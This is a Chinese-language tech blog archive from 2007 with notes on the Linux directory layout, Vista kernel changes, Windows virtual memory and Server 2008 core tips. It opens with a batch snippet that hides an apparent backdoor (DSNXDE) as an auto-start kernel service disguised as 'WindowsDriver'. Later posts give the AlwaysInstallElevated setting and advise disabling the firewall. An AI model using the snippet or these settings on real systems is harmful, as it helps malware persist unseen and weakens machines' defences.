@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [ 删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动 ]
@REM 这样不是更安全.

linux目录架构 zz

2007-12-24T12:32:00.000+08:00

/ 根目录
/bin 常用的命令 binary file 的目錄
/boot 存放系统启动时必须读取的档案，包括核心 (kernel) 在内
/boot/grub/menu.lst GRUB设置
/boot/vmlinuz 内核
/boot/initrd 核心解壓縮所需 RAM Disk
/dev 系统周边设备
/etc 系统相关设定文件
/etc/DIR_COLORS 设定颜色
/etc/HOSTNAME 设定用户的节点名
/etc/NETWORKING 只有YES标明网络存在
/etc/host.conf 文件说明用户的系统如何查询节点名
/etc/hosts 设定用户自已的IP与名字的对应表
/etc/hosts.allow 设置允许使用inetd的机器使用
/etc/hosts.deny 设置不允许使用inetd的机器使用
/etc/hosts.equiv 设置远端机不用密码
/etc/inetd.conf 设定系统网络守护进程inetd的配置
/etc/gateways 设定路由器
/etc/protocols 设定系统支持的协议
/etc/named.boot 设定本机为名字服务器的配置文件
/etc/sysconfig/network-scripts/ifcfg-eth0 设置IP
/etc/resolv.conf 设置DNS
/etc/X11 X Window的配置文件,xorg.conf 或 XF86Config 這兩個 X Server 的設定檔
/etc/fstab 记录开机要mount的文件系统
/etc/inittab 设定系统启动时init进程将把系统设置成什么样的runlevel
/etc/issue 记录用户登录前显示的信息
/etc/group 设定用户的组名与相关信息
/etc/passwd 帐号信息
/etc/shadow 密码信息
/etc/sudoers 可以sudo命令的配置文件
/etc/securetty 设定哪些终端可以让root登录
/etc/login.defs 所有用户登录时的缺省配置
/etc/exports 设定NFS系统用的
/etc/init.d/ 所有服務的預設啟動 script 都是放在這裡的，例如要啟動或者關閉
/etc/xinetd.d/ 這就是所謂的 super daemon 管理的各項服務的設定檔目錄
/etc/modprobe.conf 内核模块额外参数设定
/etc/syslog.conf 日志设置文件
/home 使用者家目录
/lib 系统会使用到的函数库
/lib/modules kernel 的相关模块
/var/lib/rpm rpm套件安装处
/lost+found 系統不正常產生錯誤時，會將一些遺失的片段放置於此目錄下
/mnt 外设的挂载点
/media 与/mnt类似
/opt 主机额外安装的软件
/proc 虚拟目录，是内存的映射
/proc/version 内核版本
/proc/sys/kernel 系统内核功能
/root 系统管理员的家目录
/sbin 系统管理员才能执行的指令
/srv 一些服務啟動之後，這些服務所需要取用的資料目錄
/tmp 一般使用者或者是正在執行的程序暫時放置檔案的地方
/usr 最大的目录，存许应用程序和文件
/usr/X11R6： X-Window目录
/usr/src： Linux源代码
/usr/include：系统头文件
/usr/openwin 存放SUN的OpenWin
/usr/man 在线使用手册
/usr/bin 使用者可執行的 binary file 的目錄
/usr/local/bin 使用者可執行的 binary file 的目錄
/usr/lib 系统会使用到的函数库
/usr/local/lib 系统会使用到的函数库
/usr/sbin 系统管理员才能执行的指令
/usr/local/sbin 系统管理员才能执行的指令
/var 日志文件
/var/log/secure 記錄登入系統存取資料的檔案，例如 pop3, ssh, telnet, ftp 等都會記錄在此檔案中
/var/log/wtmp 記錄登入者的訊息資料, last
/var/log/messages 幾乎系統發生的錯誤訊息
/var/log/boot.log 記錄開機或者是一些服務啟動的時候，所顯示的啟動或關閉訊息
/var/log/maillog 紀錄郵件存取或往來( sendmail 與 pop3 )的使用者記錄
/var/log/cron 記錄 crontab 這個例行性服務的內容
/var/log/httpd, /var/log/news, /var/log/mysqld.log, /var/log/samba, /var/log/procmail.log：
分別是幾個不同的網路服務的記錄檔

64位windows的地址空间

2007-12-20T15:26:00.000+08:00

在Itaniumuh用户地址空间为7152GB，系统空间6144GB
在X64系统上用户地址空间为8192GB，系统空间6657GB

perl常用站点

2007-12-06T08:39:00.000+08:00

http://www.dev411.com/perl/cpancompare
比较多个模块，查看流行模块列表。

http://cpanratings.perl.org/
对 cpan 上的模块发表评价

http://cpandeps.cantrell.org.uk/?module=Email%3A%3AMIME
查看模块的依赖关系

http://testers.cpan.org/
cpan 上模块的测试用例运行情况

http://search.cpan.org/
搜索模块

http://www.perl.com/
O'Reilly 的 Perl 编程专栏

http://www.perl.org/
Perl 官方网站，有许多有用链接，比如到 Perl Monks, use Perl 的链接

http://perldoc.perl.org/
Perl文档，可以下载，HTML+PDF格式

http://bbs.perlchina.org
很不稳定。经常不行。

http://bbs.chinaunix.net/forumdisplay.php?fid=25
经典的CU

http://www.perlmonks.org
perl修道院，一个比较大的社区,通常交流比较难的问题和一些trick.

http://bookmarks.cpan.org/
Perl Bookmarks

http://perlbuzz.com/
http://planet.parrotcode.org/
http://planet.perl.org/
http://news.perlfoundation.org/
http://www.roth.net/blog/index.php

提高安装权限的两种方法

2007-12-04T15:42:00.000+08:00

一般用户通常没有安装新程序的权限，如果想赋予普通用户以安装权限，有两种方法：
1) 在 MMC 里添加 Group Policy Object Editor, 设置如下： BOTH Computer Configuration & User Configuration -> Administrative Templates -> Windows Components -> Windows Installer, change the “Always install with elevated privileges” to be Enabled.

2) 更改注册表：Set the AlwaysInstallElevated registry value to "1" under the following registry keys: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer & HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer (same change as #1 but done manually with regedit).

两篇参考文章：
http://support.microsoft.com/kb/259459/EN-US/
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnlong/html/AccProtVista.asp

Vista内核变化

2007-11-24T00:19:00.000+08:00

增加了针对文件的符号链接

线程调度的时间计算
以前：基于时钟中断来计算线程执行时间
现在：按照实际执行时间

I/O系统改进
1.I/O完成端口改进
关于I/O完成端口为何物，可参考此文
以前，每次完成都立即切换到发出请求的线程
现在，延迟到该线程来读取或者处理此请求，从而避免不必要的线程环境切换
2.同步I/O可以取消
CancelSynchronouslo可取消其他线程发出的I/O操作
Cancello取消本线程I/O，CancelloEx取消任何线程操作
系统文件对话框都支持取消操作，如访问远程机器等待连接过程中
3.I/O优先级改进
以前，I/O优先级根据线程I/O优先级确定
现在，引入两种I/O优先级模式a，I/O优先级；b，I/O带宽预留

内存管理改进
1.内存池大小可以是动态的
在32位vista上，虚拟内存分配根据需要动态变化，主要针对页内存池，非换页内存池和会话内存池
2.SuperFecth
XP中prefetcher只是在启动进程是针对单个进程来预取数据
Vista中Superfetch课根据更加复杂的模式来预取数据，可阔约多个应用程序，能够适应一个系统的内存使用模式。如：a，应用程序启动时 b，系统从休眠货挂起状态恢复时 c，低优先级或不常用程序运行时
3.ReadyBoost
支持flash缓存，性能位于RAM和硬盘之间，数据被压缩和加密

引导和停机：
1.引导配置数据库，取代boot.ini
与平台无关的引导机制
贮存在注册表里HKLM\BCD000000
2.两个引导程序
Windows boot manager, \Bootmgr
OS loader, \systemroot\system32\winload.exe
3.启动过程和session管理改进
session0隔离
控制台用户位于session1中
4.停机过程改进
原先等待20s
服务可以请求停机等待
可以指定服务停机顺序

可靠性和系统恢复
1.内核事务管理器（KTM）
提供事务语义，要么完成，要么啥都不做
协调应用程序和资源管理器（注册表，NTFS文件系统）
2.Volume Shadow Copy
在XP中引用，备份工具
server 2003中用语共享文件夹的影像拷贝，版本管理
vista中可用于系统恢复，以前只可恢复已知的系统文件
3.Windows Error reporting
以前，未处理异常在一场线程环境中执行
目前，该线程发送消息web来处理

安全性
1.Bitlocker驱动器加密
对整个OS卷加密，要求a，TPM 1.2 或USB或支持USB的BIOS；b，1.5未加密系统卷
2.Code integrity verification
OS loader和内核执行代码签名检查
3.受保护进程
4.ASLR, address space load randomization，如kenerl.dll
用户栈位置也随机
5.最小特权原则 the principle of least privilege
6.UAC user account control用标准用户来运行程序

个人知识管理

2007-11-22T11:01:00.000+08:00

网上有的 -> 收藏至 del.icio.us
自己总结的 -> 写在blogger上 -> 收藏至 del.icio.us
doc, ppt等文档 -> 放在 google doc -> 收藏至 del.icio.us
考虑一下怎么更好的贴标签

【zz】虚拟内存，物理内存，页面文件，还有任务管理器

2007-11-22T10:26:00.000+08:00

发信人: Hakkk (蓝猫淘气3k问·荷兰篇), 信区: NewSoftware
标题: 虚拟内存，物理内存，页面文件，还有任务管理器
发信站: 水木社区 (Tue Nov 20 21:56:20 2007), 站内

虚拟内存（Virtual Memory）是Windows管理所有可用内存的方式。
对于32位Windows系统，每个进程所用到的虚拟内存地址从0到2^32-1，总容量4GB，
其中2GB是与操作系统以及其他所有进程所共享，
另外2GB分派给进程独占（这就是常说的32位Windows中一个进程最多能用2G内存的由来）。

4GB虚拟地址空间（Virtual Address Space，VAS）中，2GB的进程独占VAS是进程隔离的，
换句话说，每个进程都可以从RAM或者硬盘上映射到属于自己的2GB VAS。
所以虽然32位Windows每个进程最多只能获得4GB可用虚拟内存，
但是所有进程总和可以使用总量超过4GB的虚拟内存。
可惜XP只支持4GB RAM，也就是说超出部分一定得靠页面文件补足；
而比如2003企业版通过PAE支持32GB RAM，可以减少页面文件的用量。
（但单个进程最多仍然只有4GB虚拟内存地址空间，而不是32GB）

所以，一个简单的计算示例：
三个进程最多能用掉多少VAS？
2GB（共享）＋2GB（独占）×3＝8GB

这4GB的虚拟地址空间，按照4KB的大小进行分页（page），
然后以页为单位映射到实际存储单元中，包括：
·物理内存（RAM）
·页面文件（Page File，在Win9x中称为交换文件Swap File，即win386.swp）
·其他文件自身（比如一些长时间未活动的进程的exe文件自身）
可见，通常人们所说的虚拟内存实际上只是指其中的页面/交换文件而已，
这是对虚拟内存的一个错误的理解。
虚拟内存≠页面文件

RAM中除了保存最近读写的文件缓存（File Cache，相当于Win9x中的Vcache）
主要用来存储正在使用的程序代码和数据，
当RAM资源紧张，或者有程序码或数据长时间未使用时，
XP通常会将非活跃程序码所在的地址页映射回程序文件（exe、dll等），
将数据所在的地址页映射到页面文件（pagefile.sys）中并拷贝数据，
然后将它们本来占用的RAM空间释放。
这个过程称为页出（Page Out）。

当系统读取某个虚拟内存地址，而该地址所在的页不在RAM中时，
将产生一个页面错误（Page Fault）中断，
告诉系统从页面文件或者程序文件中取回包含该地址的虚拟内存页，
即将内容拷回到RAM并建立新的虚拟地址映射，并将页面文件中对应部分标记为未使用，
这个过程就是页入（Page In）。
页入成功的话就是一个Valid Page Fault，否则就是Invalid Page Fault。
前者非常普遍，（可以在任务管理器的进程页监视到）
而后者是由程序或硬件错误引起，
如果发生在进程上会导致非法操作，如果是系统自身则很可能蓝屏。

内存用量可以在任务管理器的性能页中看到。
其中物理内存的总量、可用数等是指安装的RAM容量和剩余RAM容量，
而内存使用或者提交更改的总量和限制是指虚拟内存的Commit Limit和Committed Bytes，
可以理解成系统可以使用的虚拟内存总量和当前使用量，
其中总量是由RAM大小＋页面文件大小决定的。

而在任务管理器的进程页中，“内存使用”和“虚拟内存大小”造成的误解很多，
而实际上，这两个值是对应性能监视器中该进程的Working Set和Private Bytes，

Working Set是指一个进程的4GB虚拟地址空间中被映射到RAM中的部分的大小，
通常是该进程的虚拟内存中的活跃部分。
表面看来这个表述和“进程占用的RAM大小”没有太大区别，
但至少有两种情况导致了例外的发生：
第一种是这部分虚拟内存如果是属于2G的系统共享虚拟内存，
那么它映射到的RAM地址可能和其他进程有重复，计算多个进程占用RAM总和就不正确，
使得所有进程的Working Set之和比实际占用RAM要大。
第二种是一个进程中可能有同一段RAM内容的多个引用，比如一个文件被loop多次，
此时虚拟空间中会有多段地址被映射到同一段RAM上，
从而造成该进程的Working Set比实际占用RAM要大。

Private Bytes是一个进程的2GB独占虚拟地址空间中用到的部分的大小，
无论这部分是在RAM中还是在页面文件中，甚至是在exe、dll等文件中。
所以，任务管理器进程页中的虚拟内存绝对不反映pagefile.sys的用量。

所以，任务管理器无论是进程页还是性能页都不能直接反映pagefile的使用情况，
诸如“关掉pagefile还能看到虚拟内存”之类的疑问，应该很清楚了。

下面是一个简单图示，
两个进程，各自拥有2G独占VAS，共同拥有2G共享VAS，
W代表映射到RAM中的部分（Working Set），P代表页出的部分。

0 …………………2GB独占内存……………… 2G ………2GB共享内存……… 4G
进程1 |--PPPP---------------WW-----PPPP--------|
\\\\ || \\\\
\\\\ || \\\\
\\\\ || |||| |--PPPPPPPPPPPP--WWWWWWWW--|
exe2 exe1 dll RAMemory pagefile.sys |||||||||||| ||||||||
|||| /// //\ / || | 共享内核/dll等共享RAM空间
进程2 |-PPPP------PPP---WW--WW------PP----P----|

然后，任务管理器的进程页中的“内存”就是上图中的W，
所以所有进程的内存项加起来肯定比实际用的RAM大，因为有共享部分
此外还有重复引用，比如上图中进程2独占内存中第二和第三个W指向同一段RAM空间。

而任务管理器进程页中的“虚拟内存”就是上图中右半部分，“独占VAS”。
可见pagefile只是其中的一部分，而RAM，只要用于独占VAS，一样计入了该处“虚拟内存”。

最后，实际的页面文件用量（pagefile.sys中实际使用部分），
可以在性能监视中看到，即Paging File下的% Usage和% Usage Peak
配合当前pagefile.sys的大小就可以计算出字节数，
这个值可以做为设定页面文件最小值的一个参考，
而不是用任务管理器进程页的所有进程的虚拟内存大小相加做为页面文件最小值的参考。

Windows 2008 server core的一些有用tips

2007-11-16T15:36:00.000+08:00

2008 server core没有GUI，管理全靠命令行。下面是作为QA知道会比较方便的tips：
1.在2008 server core上安装VMware tools：
这里的步骤讲的很清楚，同一网站上还提供了如何改变屏幕解析度，改变睡眠设置
2.启动romotedesktop
cscript c:\windows\system32\scregedit.wsf /AR 0
启动完就可以远程登录玩了
3.传输文件
2008自带了ftp服务，用来传送文件应该最为稳定。如果不用自带服务，从远程ftp下载文件，需要把防火墙关了
netsh firewall set opmode disable
测试时，强烈建议关了防火墙，不然总有些莫名其妙的问题，关了一了百了
4. 在2008 server core上增加新硬件
pnputil -i -a ; driverinf is the file name of the .inf file for the driver

hello world!

2007-03-02T14:06:00.000+08:00

Welcome!